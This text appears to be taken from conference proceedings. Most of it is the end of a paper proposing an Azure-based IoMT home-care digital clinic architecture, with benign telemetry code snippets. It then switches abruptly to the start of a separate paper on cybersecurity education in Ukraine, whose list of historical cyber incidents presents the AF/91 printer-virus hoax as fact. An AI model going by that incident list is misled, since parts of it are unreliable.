ML is crucial for the functioning of IoMT services and concerns the tasks of diagnosis, prediction, making the most effective clinical decisions for treatment, and performing algorithmic tasks. IoMT most often uses such ML algorithms as regression, decision trees, random forests, k nearest neighbors, logistic regression, etc. Of particular note in the IoMT framework is neural-network-based DL, which demonstrates high accuracy in interpreting health-related data. State-of-the-art DL algorithms can detect and recognize phenomena from digital cameras, data-generating medical components and other IoMT sources in real time. This has introduced a new generation of DL programs with IoMT support that is more powerful and efficient than ML [39]. The advantage is that DL algorithms are able to collect and efficiently process heterogeneous sensor data. Such opportunities help to better identify trends in the analysis and generate more accurate solutions for the diagnosis, treatment and prognosis of disease. AR and VR technologies have significant potential for digital home health care and updated outpatient clinics. These technologies provide digital clinics with a three-dimensional multisensory environment; VR and AR can create a feeling of complete immersion in an authentic simulation of the virtual world [40–43]. There is evidence of the effectiveness of therapeutic use of VR and AR technologies in the treatment of a wide range of diseases, in supporting cognitive-behavioral therapy and patients with cognitive disorders, and in facilitating the emotional well-being and educational activities of patients. Currently, the Smart Healthcare and IoMT device market offers a broad range of e-Health sensors for measuring body temperature (Temperature Sensor), blood pressure
(Blood Pressure Sensor), blood sugar (Glucometer Sensor), pulse and oxygen saturation (Pulse Oximeter Sensor), lung air volume and breathing rate (Airflow Sensor), electrical and muscular functions of the heart (Electrocardiography Sensor), electrical conductivity of the skin (Galvanic Skin Response Sensor), physical activity (Accelerometer Sensor), electrical activity of muscles at rest and during contraction (Electromyogram Sensor), biopotentials of the brain (Electroencephalography Sensor), body mass index and metabolic indicators (Body Weight Sensor), etc. In order to simultaneously collect all of the above-mentioned biometric data from the patient, it is possible to integrate e-Health sensors on one platform (board). The approximate cost of such a platform of e-Health sensors (a 15-sensor kit) is $70–100 per year of use with maintenance. In general, data-generating medical components in IoMT for home care may include e-Health sensors, wearables, smart garments and environmental sensors. Data collection in IoMT and further analyses become more effective with Edge AI support. The cost of such an IoMT system with Edge AI support will be higher and depends on the number and functionality of the devices, the amount of information processed in the Edge/Fog/Cloud computing environment, and the load-dependent options of the cloud platform.

An important issue when building a digital clinic with IoMT for home smart healthcare is the selection of data-generating medical components most compatible with the chosen cloud platform in the Edge/Fog/Cloud computing environment. Peerbridge Health and Smart Band Sensoria are Microsoft Azure IoT partners developing certified IoT-enabled devices for remote patient monitoring and AI-powered smart garments. These devices have been tested in clinical trials, which confirmed their effectiveness. It is worth noting that the market of data-generating medical components for IoMT in Ukraine is just beginning its development and still requires significant effort and coordination for introduction and integration into the eHealth ecosystem.

The Edge level in IoMT covers the collection and initial processing of data from data-generating medical components, performing computing operations through an installed IoMT application on a smartphone or computer. The Fast Healthcare Interoperability Resources (FHIR) standard enables the distributed collection of information from data-generating medical components. IoMT devices have limited computing power, which can cause latency when processing large amounts of data. Fog computing facilitates load balancing in IoMT and uses nodes located between the Edge and Cloud levels; Fog nodes can be placed near devices on a local network. The issue of software for nodal base stations is important. The Linux operating system is compatible with almost any modern IoT hardware platform due to its open-source code and can be recommended for installation on a computer in an IoT network. At the same time, it is also possible to install the Windows 10 operating system, represented by two editions, Windows 10 IoT Core and Windows 10 IoT Enterprise. Windows 10 IoT Core can support a small number of devices. At the same time, Windows 10 IoT makes it possible to use Microsoft Azure IoT services fully.
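As a minimal illustration of the Edge level described above, a gateway script might collect a reading, perform a lightweight on-device check, and publish it upstream over MQTT; the broker address, topic scheme, payload format and reading interval are assumptions, not part of the paper:

```python
# Hypothetical Edge-gateway sketch: read a vital sign, do a lightweight
# on-device (Edge) check, and publish the reading upstream over MQTT.
import json
import time
import paho.mqtt.client as mqtt

BROKER = "fog-gateway.local"          # assumed Fog-level broker address
TOPIC = "clinic/patient42/vitals"     # assumed topic naming scheme

def read_heart_rate():
    """Placeholder for a real sensor driver."""
    return 74

client = mqtt.Client()
client.connect(BROKER, 1883)
client.loop_start()                   # background network loop for QoS

while True:
    hr = read_heart_rate()
    payload = {"ts": time.time(), "heart_rate": hr,
               "alert": hr < 40 or hr > 150}   # Edge-level pre-screening
    client.publish(TOPIC, json.dumps(payload), qos=1)
    time.sleep(60)                             # one reading per minute
```

The same pattern transfers to managed services such as Azure IoT Hub, where the device SDK replaces the raw MQTT client.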
3 Results
The results of our research have shown that an effective component of a modern digital clinic is the creation of voice virtual medical assistants for the patient with support for AI, ML, DL, AR, and VR. Such virtual medical assistants can hold online conversations and interpret patients' answers. In addition, voice assistants can ask clarifying questions and make effective recommendations through text or AI-based speech synthesis instead of requiring direct contact with a live human agent. The developed voice virtual assistants can continuously perform a variety of programmed sets of actions and user requests and support effective decision-making. A valuable application is also the ability to identify physical space on the basis of computer vision and to determine geolocation. Voice assistants with support for AI, VR, and AR can guide the patient through instructions, providing greater interactivity, and can simulate a professional assistant in dealing with health issues. All of these features make patient interaction more engaging, are useful for supporting diagnosis, treatment, and prevention, and could considerably improve the functionality of outpatient clinics.
One of the main problems with IoMT systems is the lack of common security protocols. This makes IoMT systems vulnerable to hacking and cyber-attacks, such as DDoS attacks. To overcome this problem, modern research proposes using the unique properties of blockchain systems for data encryption in IoMT applications. Blockchain technology makes it possible to build applications on a blockchain platform and use smart contracts. This approach allows implementing decentralized applications (DApps) and decentralized autonomous organizations (DAO) to ensure an appropriate level of security in IoMT systems. The decision to use hybrid blockchains with support for AI, ML, and DL for IoMT is promising. The most common blockchain for this implementation is Ethereum. In addition, the integration of the Ethereum blockchain with Edge AI has potential. Thanks to Edge AI, IoMT gains numerous features related to a high level of privacy, faster system operation, and lower power consumption [17]. Thus, it can help to develop multifaceted wearable data-generating medical components.
Our research has shown that the integration of AI, ML, DL, VR, and AR technologies into IoMT has significant advantages for the introduction of a digital home health care clinic. Such solutions complement its valuable capabilities and expand its functionality. ML and DL play an important role: they allow constant real-time monitoring of the patient's vital signs (blood pressure, heart rate, respiratory rate, etc.), support diagnosis, and recognize the patient's motor activity in interaction with the environment.
Experimental work in our study focused on analyzing Microsoft Cloud for Healthcare solutions for deploying a patient-centered digital clinic. Microsoft Cloud for Healthcare offers a wide range of eHealth solutions. Reliable functionality of this implementation is provided by combining various services of the Microsoft ecosystem: Microsoft Cloud for Healthcare solutions with Microsoft Azure IoT, Dynamics 365, Microsoft Power Platform, and Microsoft 365.
Microsoft proposes the following tools to deploy digital health services: Virtual Health, Virtual Visits, Virtual Clinic, Home Health, Care Management, Health Assistant, Azure Health Bot, Patient Portal, Personalized Care, Health Analytics, Azure Health Data Services, Text Analytics for health in Azure Cognitive Service for Language, Vision AI solutions with Azure IoT Edge, Azure IoT Edge, Azure Machine Learning, Azure Storage, Azure App Services, Power BI, Blockchain with Azure virtual machines, etc. These tools create enhanced capabilities for the functionality of the patient-centered digital clinic and complement it with advanced e-health services. Powerful predictive analytics for data modeling and identifying clinical trends is a significant benefit of Microsoft Cloud for Healthcare solutions [38]. It is also important that the unification and standardization of data coming from different IoMT devices are provided. This capability is implemented using Fast Healthcare Interoperability Resources (FHIR), an HL7 specification for healthcare interoperability; Azure IoT Connector services for FHIR; and Digital Imaging and Communications in Medicine (DICOM), the international standard for transmitting, storing, retrieving, printing, processing, and displaying medical imaging information. A special role is played by Azure AutoML, which automates the time-consuming and iterative tasks of ML model development. The possibility of connecting blockchain with Azure virtual machines is promising: Azure has templates for deploying most blockchain ledgers on virtual machines.
Microsoft Cloud for Healthcare focuses on the ability to create and deploy powerful AI-enabled virtual voice assistants. Azure Health Bot allows patients to interact effectively with the bot through text or voice. Health Bot implements natural language understanding and AI technologies to identify the patient's intentions and provide accurate information [44]. Built-in medical intelligence to support clinical decisions is a key feature for creating functional voice care assistants. It is possible to include custom scenarios and to integrate with other IT systems and data sources. Importantly, Health Bot uses several trusted providers of medical content to create and test clinical content. For example, Microsoft may offer an effective integration of the Infermedica expert system in the development of virtual health care providers. Infermedica offers an advanced mechanism for analyzing the patient's symptoms by ML means with a high level of clinical accuracy; its decision-making system is based on clinically validated probabilistic models and evidence-based approaches. The Capita Healthcare Decisions Triage resource also has strong capabilities for implementing the Hospital at Home project and supporting the adoption of evidence-based clinical guidelines. The Infermedica and Capita Healthcare Decisions Triage medical intelligence services for clinical decision-making are primarily used in the US and EU countries and, consequently, are not widely known in the Ukrainian medical space. With the development of IoMT, we can expect increased interest in these services in Ukraine, which could encourage their developers to create the necessary language localization.
Azure IoT makes it possible to deploy highly functional, high-security IoT technology for healthcare. Azure IoT supports a wide range of devices, including industrial equipment, microcontrollers, and sensors. An example of a successful implementation of Azure IoT is the IoT Connected Platform for COVID-19 detection and prevention. An effective approach to deploying a digital clinic with IoT using Microsoft Azure IoT is the SaaS solution Azure IoT Central. This solution uses Azure IoT Hub as a server component integrated with other Azure services, providing reliable communication between the cloud layer and IoT devices.
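As a concrete illustration of device-to-cloud communication through Azure IoT Hub, the sketch below sends one telemetry message using the azure-iot-device Python SDK. The connection string is a placeholder for a real device registration, and the message fields are illustrative assumptions rather than a prescribed schema.

```python
# Minimal sketch: one device-to-cloud telemetry message via Azure IoT Hub.
# Requires the azure-iot-device package; the connection string is a placeholder.
import json
from azure.iot.device import IoTHubDeviceClient, Message

CONNECTION_STRING = "HostName=<hub>.azure-devices.net;DeviceId=<id>;SharedAccessKey=<key>"

client = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING)
client.connect()

telemetry = {"heart_rate_bpm": 72, "spo2_percent": 97.5, "temperature_c": 36.6}
msg = Message(json.dumps(telemetry))
msg.content_type = "application/json"  # lets downstream services parse the body
msg.content_encoding = "utf-8"

client.send_message(msg)
client.disconnect()
```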
There is an option to integrate IoT Hub with other Azure services, such as Azure Machine Learning and Azure Stream Analytics for performing analytical calculations. IoT Hub also connects to Azure App Service for building web and mobile apps, Notification Hubs for push notifications, and Power BI for building dashboards. To store data, Azure offers Azure Cosmos DB as a NoSQL database, Azure SQL Database as a relational DBMS, Azure Blob Storage for file storage, and Azure Data Lake as a distributed data store, while Time Series Insights provides analytics, storage, and aggregation services. The volume of data processed in IoT Hub is measured daily, and the cost of use is billed monthly based on the number of IoT Hub units. For example, for up to 6 devices there may be no charge in the standard Azure offering, while for 7 to 70 devices the cost will be approximately $10 to $25 per month depending on the selected services. Another service relevant to IoMT is Azure Digital Twins, which allows simulating and creating complex digital models of connected environments; based on statistics obtained from Azure Digital Twins, it is possible to better optimize IoMT operations and costs. It is also worth noting that Azure provides Azure IoT Central application templates, the capability to build custom mobile IoMT applications, and an IoMT connector for FHIR to meet the various needs of healthcare IoMT developers and simplify the development of IoMT solutions.
Based on the analysis of existing reference architectures of IoT systems, we propose a modified IoMT architecture for a digital clinic that meets specific healthcare requirements. This modification includes IoMT data-generating medical components, the transformation of their data into formalized medical records, and integrated medical intelligence services for evidence-based clinical decisions. The proposed modified architecture contains the following components:
• (C1) Data-generating medical components (sensors, etc.) that send data to a smartphone, tablet, or computer.
• (C2) Edge servers that send data to the Azure IoMT center after initial processing.
• (C3) Azure API for FHIR that performs data transformation.
• (C4) FHIR data analysis, processing, and visualization in Azure.
• (C5) Integration of Microsoft Cloud for Healthcare services for clinical decision support.
At the level of C1 components, Edge computing performs device registration, provisioning, and data ingestion; Azure IoT Edge can quickly recognize and respond to sensor input using ML. At the level of C2 components, smart IoT Edge devices send only the necessary data to the cloud, thus reducing costs, while Azure Storage provides secure blob storage for unstructured data in the Azure cloud. At the level of C3 components, the Azure API for FHIR transforms the data into a structured electronic medical record and personal health record, and Azure Stream Analytics performs real-time processing and validation of both edge and cloud data. At the level of C4 components, Power BI visualization is used to create informative interactive reports based on HL7 FHIR data.
At the level of C5 components, the integration of Microsoft Cloud for Healthcare services for clinical decision support with medical intelligence services (for example, Infermedica and Capita Healthcare Decisions Triage) produces evidence-based clinical decisions for the patient. The proposed modified reference architecture may become the basis for the implementation of the "Hospital at Home" project and be integrated into the eHealth ecosystem, supplementing it with useful services for patients. A particular implementation plan for the "Hospital at Home" project can be based on the specified components of the modified architecture, with due attention to the details at each level and to the scale of implementation. Currently, there is a lack of examples of effective implementation of a patient-oriented virtual clinic with IoMT in Ukraine. The conducted research suggests possible ways to introduce such an innovation, which will surely benefit patients and doctors.
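A minimal sketch of the edge-side filtering idea behind component C2 is shown below: the edge node forwards a reading to the cloud only when it leaves an acceptable range or a periodic reporting interval has elapsed. The thresholds, interval, and the `send_to_cloud` stub are illustrative assumptions, not clinical guidance.

```python
# Minimal sketch of C2-style edge filtering: forward to the cloud only readings
# that are out of range or due as a periodic heartbeat. All thresholds are
# illustrative assumptions.
import time

NORMAL_RANGES = {"heart_rate_bpm": (50, 110), "spo2_percent": (94, 100)}
HEARTBEAT_SECONDS = 300  # send at least one reading every 5 minutes

_last_sent = float("-inf")

def send_to_cloud(reading: dict) -> None:
    # Stub: a real deployment would call the IoT Hub client shown earlier.
    print("forwarding to cloud:", reading)

def on_new_reading(reading: dict) -> None:
    """Forward abnormal readings immediately; otherwise rate-limit uploads."""
    global _last_sent
    abnormal = any(
        not (low <= reading[key] <= high)
        for key, (low, high) in NORMAL_RANGES.items()
        if key in reading
    )
    now = time.monotonic()
    if abnormal or now - _last_sent >= HEARTBEAT_SECONDS:
        send_to_cloud(reading)
        _last_sent = now

on_new_reading({"heart_rate_bpm": 72, "spo2_percent": 97})   # first call: heartbeat sent
on_new_reading({"heart_rate_bpm": 74, "spo2_percent": 98})   # in range: suppressed
on_new_reading({"heart_rate_bpm": 128, "spo2_percent": 91})  # abnormal: sent immediately
```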
4 Discussion
The practical value of the study lies in highlighting how IoMT solutions can be applied in the development of a patient-oriented digital clinic with the integration of AI, ML, DL, AR, VR, and blockchain in a modern Edge/Fog/Cloud computing environment. It has been established that the introduction of a patient-oriented digital clinic with IoMT technology and such integration has significant benefits for the functionality of outpatient clinics, improving and streamlining patient health care and providing quality care. IoMT technologies contribute to the evolution of digital clinics and open new opportunities for diagnosis, treatment, and prevention, so the demand for this component of the modern digital ecosystem is growing and will continue to grow.
An important reinforcing and promising component of a modern digital clinic is the creation of voice virtual medical assistants for the patient with support for AI, ML, DL, AR, and VR. This innovation expands the functionality of the digital clinic and makes it a powerful tool in the management of patient health. The introduction of virtual medical assistants in the field of military medicine also has significant potential. It has been found that the most effective approach for a patient-centered digital home care clinic is to create a voice 3D chatbot avatar with AI and AR support. Creating dynamic voice chatbots in the format of a 3D AR avatar (Virtual Human) makes them more lifelike and interactive, and this implementation is more enjoyable for patients than traditional dialog chatbots based on a set of text commands. Virtual health care providers are used to diagnose, treat, and monitor health; to improve patient education and personal awareness of the disease; to improve psychological and behavioral outcomes and adherence to treatment; and to increase physical activity, support weight control, improve preparedness for doctor visits, and more. This reduces costs and staffing needs, increases the work efficiency of outpatient clinics, improves health outcomes, and provides convenience and satisfaction for patients.
5 Conclusions
As a result of our research, the prospects and feasibility of introducing a digital clinic for home health care with IoMT support and modern e-health technologies have been substantiated. We have explored the application and features of IoMT solutions in the development of a patient-oriented digital clinic that integrates data-generating medical components with modern technologies such as AI, ML, DL, AR, VR, and blockchain in the Edge/Fog/Cloud computing environment. The proposed supplement to the digital healthcare ecosystem, an innovative and promising service that we define as a patient-centered digital clinic with broad integration of data-generating personal medical components and IoMT technologies, is described and analyzed. This innovation is mainly embodied in the updated functionality of outpatient clinics and in home health care, and it expands the ecosystem with the Hospital at Home project, which is of great interest to patients.
The architecture of a digital clinic system with IoMT support for home health care is presented. It consists of three levels: (1) the device level, where IoMT data-generating medical components collect patient information and perform preliminary computing at the Edge; (2) the Fog level, at which patient information is analyzed according to the appropriate classification rules on a local server; and (3) the Cloud level, which performs data analysis and decision-making and coordinates the work of the patient-centered digital clinic's ecosystem and the general eHealth system.
An important step in the productive operation of a patient-centered digital clinic is data analysis, which can be improved with the help of modern AI technologies such as ML and DL. AR and VR technologies have significant potential for digital home health care and updated outpatient clinics. The results of our research have shown that an effective component of a modern digital clinic is the creation of voice virtual medical assistants for the patient with support for AI, ML, DL, AR, and VR. The decision to use hybrid blockchains with support for AI, ML, and DL for IoMT is promising.
Microsoft Cloud for Healthcare solutions with the integration of Microsoft Azure IoT, Dynamics 365, Microsoft Power Platform, and Microsoft 365 for the deployment of a patient-oriented digital clinic are analyzed. Powerful predictive analytics for data modeling and identifying clinical trends is a significant benefit of these solutions. It is established that the Microsoft Cloud for Healthcare solution, owing to the integration of various Microsoft services for the Internet of Things, makes it possible to deploy a sufficiently functional and highly secure patient-oriented digital clinic. A significant contribution is provided by the ability of Microsoft Cloud for Healthcare to develop AI-enabled voice virtual assistants with Azure Health Bot. Built-in medical intelligence supporting evidence-based clinical decisions and advanced data analytics models could offer ample opportunity to scale this innovation and expand the functionality of the prospective eHealth ecosystem.
The scientific novelty of our research is the development of a modified architecture of a patient-oriented digital clinic with IoMT based on the integration of Microsoft Azure IoT and Microsoft Cloud for Healthcare solutions, which meets the particular tasks of healthcare. Important components of this architecture are the data-generating medical components, the transformation of medical data into formalized electronic medical records and personal health records, and integrated medical intelligence services for high diagnostic accuracy and effective evidence-based clinical decision-making. It has been established that the defined universal components of the digital clinic architecture with IoMT can be supplemented with such a progressive solution as dynamic voice chatbots in the format of a mobile 3D AR avatar (Virtual Human) with support for AR, VR, and DL, providing a simulation of human interaction that comforts patients and decreases stress.
Prospective and promising implementations of the Virtual Human for home health with AR/VR and DL include: (1) productive tracking of the patient's treatment process and correct adherence to the doctor's recommendations; (2) creation of personalized evidence-based content for coaching on emotional support, motivation, mental health, the formation of healthy-lifestyle habits, and increasing patients' awareness of their diseases and of modern evidence-based methods of treatment, prevention, and health care; (3) generation of personalized evidence-based content for cognitive training with gamification elements (a game design approach) to support patient health and track progress. Currently, these implementations can be partially achieved with the Azure Health voice Bot with AI and ML support. Designing a more interactive mobile 3D AR avatar requires integrating AR/VR, AI computer vision technology, and more productive DL. We consider further research devoted to the development of a dynamic 3D AR avatar with the integration of the above-specified technologies to be promising.
Important issues for further research include ensuring the proper usability of digital home health care clinic services for both health professionals and patients. In addition, ensuring a high level of medical data protection with the prospective integration of blockchain technology requires attention and appropriate elaboration. Quantifying the added benefit and effect size, in terms of Cohen's d, of introducing elements of the patient-centered digital clinic's ecosystem will be an important component of further research. Such an assessment can be made based on a comparative analysis of selected performance indicators of traditional health care approaches and of pilot projects implementing the approaches discussed above, with the aim of their further adjustment and improvement.
References
1. Dwivedi, R., Mehrotra, D., Chandra, S.: Potential of Internet of Medical Things (IoMT) applications in building a smart healthcare system: a systematic review. J. Oral Biol. Craniofac. Res. 12(2), 302–318 (2022). https://doi.org/10.1016/j.jobcr.2021.11.010
2. Murphy, E.P., et al.: Are virtual fracture clinics during the COVID-19 pandemic a potential alternative for delivering fracture care? A systematic review. Clin. Orthop. Relat. Res. 478(11), 2610–2621 (2020). https://doi.org/10.1097/CORR.0000000000001388
3. Nerpin, E., Toft, E., Fischier, J., Lindholm-Olinder, A., Leksell, J.: A virtual clinic for the management of diabetes-type 1: study protocol for a randomised wait-list controlled clinical trial. BMC Endocr. Disord. 20(1), 137 (2020). https://doi.org/10.1186/s12902-020-00615-3
4. Healy, P., et al.: Virtual outpatient clinic as an alternative to an actual clinic visit after surgical discharge: a randomised controlled trial. BMJ Qual. Saf. 28(1), 24–31 (2019). https://doi.org/10.1136/bmjqs-2018-008171
5. Boyd, C., et al.: Machine learning quantitation of cardiovascular and cerebrovascular disease: a systematic review of clinical applications. Diagnostics 11(3), 551 (2021). https://doi.org/10.3390/diagnostics11030551
6. Murthy, N.S., Bethala, C.: Review paper on research direction towards cancer prediction and prognosis using machine learning and deep learning models. J. Ambient Intell. Humaniz. Comput. (2021). https://doi.org/10.1007/s12652-021-03147-3
7. Tan, K.R., et al.: Evaluation of machine learning methods developed for prediction of diabetes complications: a systematic review. J. Diabetes Sci. Technol. 3, 1–16 (2021). https://doi.org/10.1177/19322968211056917
8. Gautam, R., Sharma, M.: Prevalence and diagnosis of neurological disorders using different deep learning techniques: a meta-analysis. J. Med. Syst. 44(2), 1–24 (2020). https://doi.org/10.1007/s10916-019-1519-7
9. Rutkowski, S., et al.: Use of virtual reality-based training in different fields of rehabilitation: a systematic review and meta-analysis. J. Rehabil. Med. 52(11), 1–16 (2020). https://doi.org/10.2340/16501977-2755
10. Greco, L., Percannella, G., Ritrovato, P., Tortorella, F., Vento, M.: Trends in IoT based solutions for health care: moving AI to the edge. Pattern Recogn. Lett. 135, 346–353 (2020). https://doi.org/10.1016/j.patrec.2020.05.016
11. Poongodi, M., Sharma, A., Hamdi, M., Maode, M., Chilamkurti, N.: Smart healthcare in smart cities: wireless patient monitoring system using IoT. J. Supercomput. 77(11), 12230–12255 (2021). https://doi.org/10.1007/s11227-021-03765-w
12. Coulby, G., Clear, A., Jones, O., Young, F., Stuart, S., Godfrey, A.: Towards remote healthcare monitoring using accessible IoT technology: state-of-the-art, insights and experimental design. Biomed. Eng. Online 19(1), 80 (2020). https://doi.org/10.1186/s12938-020-00825-9
13. Aghdam, Z.N., Rahmani, A.M., Hosseinzadeh, M.: The role of the Internet of Things in healthcare: future trends and challenges. Comput. Methods Programs Biomed. 199, 105903 (2021). https://doi.org/10.1016/j.cmpb.2020.105903
14. de Queiroz, D.A., da Costa, C.A., de Queiroz, E.A.I.F., da Silveira, E.F., da Rosa Righi, R.: Internet of Things in active cancer treatment: a systematic review. J. Biomed. Inform. 118, 103814 (2021). https://doi.org/10.1016/j.jbi.2021.103814
15. Mamdiwar, S.D., Shakruwala, Z., Chadha, U., Srinivasan, K., Chang, C.Y.: Recent advances on IoT-assisted wearable sensor systems for healthcare monitoring. Biosensors 11(10), 372 (2021). https://doi.org/10.3390/bios11100372
16. Jagadeeswari, V., Subramaniyaswamy, V., Logesh, R., Vijayakumar, V.: A study on medical Internet of Things and Big Data in personalized healthcare system. Health Inf. Sci. Syst. 6(1), 1–20 (2018). https://doi.org/10.1007/s13755-018-0049-x
17. Kamruzzaman, M.M., Alrashdi, I., Alqazzaz, A.: New opportunities, challenges, and applications of Edge-AI for connected healthcare in Internet of Medical Things for smart cities. J. Healthcare Eng. 2022, 1–6 (2022). https://doi.org/10.1155/2022/2950699
18. Muna, A.: Internet of medical things and edge computing for improving healthcare in smart cities. Math. Probl. Eng. 2022, 1–10 (2022). https://doi.org/10.1155/2022/5776954
19. Tiwari, A., Viney, D., Mohamed, A.M., Haider, A., Abolfazl, M., Mohammad, S.: Patient behavioral analysis with smart healthcare and IoT. Behav. Neurol. 2021, 1–9 (2021). https://doi.org/10.1155/2021/4028761
20. Amin, S.U., Hossain, M.S.: Edge intelligence and the Internet of Things in healthcare: a survey. IEEE Access 9, 45–59 (2021). https://doi.org/10.1109/ACCESS.2020.3045115
21. Alshehri, F., Muhammad, G.: A comprehensive survey of the Internet of Things (IoT) and AI-based smart healthcare. IEEE Access 9, 3660–3678 (2021). https://doi.org/10.1109/ACCESS.2020.3047960
22. Veeramakali, T., Siva, R., Sivakumar, B., Senthil Mahesh, P.C., Krishnaraj, N.: An intelligent internet of things-based secure healthcare framework using blockchain technology with an optimal deep learning model. J. Supercomput. 77(9), 9576–9596 (2021). https://doi.org/10.1007/s11227-021-03637-3
23. Thomson, C., Beale, R.: Is blockchain ready for orthopedics? A systematic review. J. Clin. Orthop. Trauma 23(1), 101615 (2021). https://doi.org/10.1016/j.jcot.2021.101615
24. Aujla, G.S., Jindal, A.: A decoupled blockchain approach for edge-envisioned IoT-based healthcare monitoring. IEEE J. Sel. Areas Commun. 39(2), 491–499 (2021). https://doi.org/10.1109/JSAC.2020.3020655
25. Alkhateeb, A., Catal, C., Kar, G., Mishra, A.: Hybrid blockchain platforms for the Internet of Things (IoT): a systematic literature review. Sensors 22(4), 1304 (2022). https://doi.org/10.3390/s22041304
26. Kamruzzaman, M.M., Bingxin, Y., Nazirul, I., Alruwaili, O., Min, W., Alrashdi, I.: Blockchain and fog computing in IoT-driven healthcare services for smart cities. J. Healthcare Eng. 2022(9957888), 1–13 (2022). https://doi.org/10.1155/2022/9957888
27. Gunasekeran, D.V., Tseng, R.M., Tham, Y.C., Wong, T.Y.: Applications of digital health for public health responses to COVID-19: a systematic scoping review of artificial intelligence, telehealth and related technologies. Digit. Med. 4(1), 40 (2021). https://doi.org/10.1038/s41746-021-00412-9
28. Shamsabadi, A., et al.: Internet of things in the management of chronic diseases during the COVID-19 pandemic: a systematic review. Health Sci. Rep. 5(2), e557 (2022). https://doi.org/10.1002/hsr2.557
29. Hrynzovskyi, A.M., Bielai, S.V., Kernickyi, A.M., Pasichnik, V.I., Vasischev, V.S., Minko, A.V.: Medical social and psychological aspects of assisting the families of the military personnel of Ukraine who performed combat tasks in extreme conditions. Wiadomosci Lekarskie 75(2), 310–317 (2022). https://pubmed.ncbi.nlm.nih.gov/35182141/
30. Ruggiano, N., et al.: Chatbots to support people with dementia and their caregivers: systematic review of functions and quality. J. Med. Internet Res. 23(6), e25006 (2021). https://doi.org/10.2196/25006
31. Oh, Y.J., Zhang, J., Fang, M.L.: A systematic review of artificial intelligence chatbots for promoting physical activity, healthy diet, and weight loss. Int. J. Behav. Nutr. Phys. Activity 18(160) (2021). https://doi.org/10.1186/s12966-021-01224-6
32. Azure IoT Platform: Azure IoT Hub. https://azure.microsoft.com/en-us/services/iot-hub/#overview
33. Google Cloud IoT Platform: Google Cloud IoT solutions. https://cloud.google.com/solutions/iot
34. AWS IoT Platform: AWS IoT services. https://aws.amazon.com/iot/
35. IBM Watson™ IoT Platform: IoT solutions. https://www.ibm.com/cloud/internet-of-things
36. Microsoft Cloud for Healthcare: Transform the Healthcare Journey. https://www.microsoft.com/en-us/industry/health/microsoft-cloud-for-healthcare
37. ThingSpeak Platform: ThingSpeak for IoT Projects. https://thingspeak.com/
38. ScienceSoft Platform: IoT Solutions for Healthcare. https://www.scnsoft.com/services/iot/medical
39. Rahman, M.A., Hossain, M.S.: An Internet-of-medical-things-enabled edge computing framework for tackling COVID-19. IEEE Internet Things J. 8(21), 15847–15854 (2021). https://doi.org/10.1109/JIOT.2021.3051080
40. Chalyi, A.V., Kryvenko, I.P., Chalyy, K.O.: Synergetic Integration of Traditional and AR-Content during Medical Informatics Studies. https://lib.iitta.gov.ua/id/eprint/727353
41. Kryvenko, I.P., Chalyy, K.O.: Providing Authentic Learning in Online Courses by Tools of Augmented and Virtual Reality. https://lib.iitta.gov.ua/id/eprint/730975
42. Kryvenko, I.P., Chalyy, K.O.: Modern eHealth Technologies and Patient-Centered Applications Usability. https://wiadlek.pl/05-2022
43. Kalashchenko, S.I., Hrynzovskyi, A.M.: Immersion technologies influence on students' psychophysiological status of the National Guard military academy of Ukraine. Ukrayins'kyy zhurnal viys'kovoyi medytsyny 3(1), 60–66 (2022). https://doi.org/10.46847/ujmm.2022.1(3)-060
44. Health Bot Overview: A managed service purpose-built for development of virtual healthcare assistants. https://docs.microsoft.com/en-us/azure/health-bot/overview
Information and Communication Technology in Higher Education
Implementation of Active Cybersecurity Education in Ukrainian Higher School
Volodymyr Buriachok, Nataliia Korshun, Oleksii Zhyltsov, Volodymyr Sokolov, and Pavlo Skladannyi
Borys Grinchenko Kyiv University, Kyiv, Ukraine
{v.buriachok,n.korshun,o.zhyltsov,v.sokolov,p.skladannyi}@kubg.edu.ua
Abstract. Cybersecurity, as a part of information technology, requires constant professional development from teachers, which makes it a suitable case for studying the implementation of active learning methods. The experience of higher technical educational institutions in the countries of the European Union (Germany, France, Sweden, etc.) shows that the introduction of active learning elements and the Conceive-Design-Implement-Operate (CDIO) approach dramatically increases student engagement and improves learning outcomes. The article considers the stages of formation of the process of training specialists in cybersecurity. In addition, the experience of introducing active learning methods into the educational process is presented, and its results are analyzed. The technology of implementing active learning and the results obtained are presented for the training of professionals at the second (Master's) level in the specialty 125 "Cybersecurity" at Borys Grinchenko Kyiv University. The effect is confirmed by the average score of graduate students, which increased by three points, from 76.3 to 79.3.
Keywords: Active learning · practice-oriented training · Conceive-Design-Implement-Operate · CDIO · cybersecurity
1 Introduction
Four industrial revolutions and one information revolution over the past few centuries generated the emergence and formation of the information and cyber environment, gave rise to the development of the modern information society, and led to the synthesis of two types of technology: information and telecommunication [1]. However, the state of world parity and of relations among nations in the information and cyber environment unfortunately still needs further development. This can be explained by the fact that, over the last decades, information and cyber operations have become an integral part of the internal and external affairs of most countries in the world; they increasingly affect economic and social development and make vital infrastructure objects of those countries vulnerable and sensitive to threats of anthropogenic and technological nature and to natural disasters. Beginning with the 1980s, the most significant events of this kind, according to the world community, include the following [2–8]:
• The events of June 1982, when the CIA disabled the Soviet gas pipeline Urengoy–Surgut–Chelyabinsk using a logic bomb embedded into the software for the automation of technological process management [9].
• The events of 1991, when the AF/91 computer virus, installed in a printer chip, enabled the US secret services to deactivate the Iraqi air defense control system during operation Desert Storm [10].
• The events of 2003–2009, when the Slammer virus switched off the security monitoring systems of the Davis-Besse Nuclear Power Plant in Ohio for 5 h [11]; when a DDoS attack was launched at Estonian national geoinformation systems and mass media [12]; when an information attack code-named Titan Rain affected military contractors at Sandia National Laboratories and Redstone Arsenal, while designs for the F-35 Lightning II fighter-bomber were stolen from Lockheed Martin servers; and when the Conficker computer worm damaged French fighters as well as digital systems of ships and submarines of the British Royal Navy and of the House of Commons of the British Parliament [14].
• The events of 2010–2013, when targeted malicious software (the network computer worms Duqu, Flame, Stuxnet, Gauss, and Sputnik) initiated inter-state incidents such as the spy operations NetTraveler [15] and Red October [16].
• The events of 2014–2016, when, through an attack on the SCADA systems of the Ukrainian enterprises Prykarpattyaoblenergo and Kyivoblenergo, unknown intruders managed to switch off seven 110 kV substations and twenty-three 35 kV substations, leaving 80,000 people without electricity for 6 h; and when offenders infected one of the workstations at the Boryspil airport with the BlackEnergy virus [17].
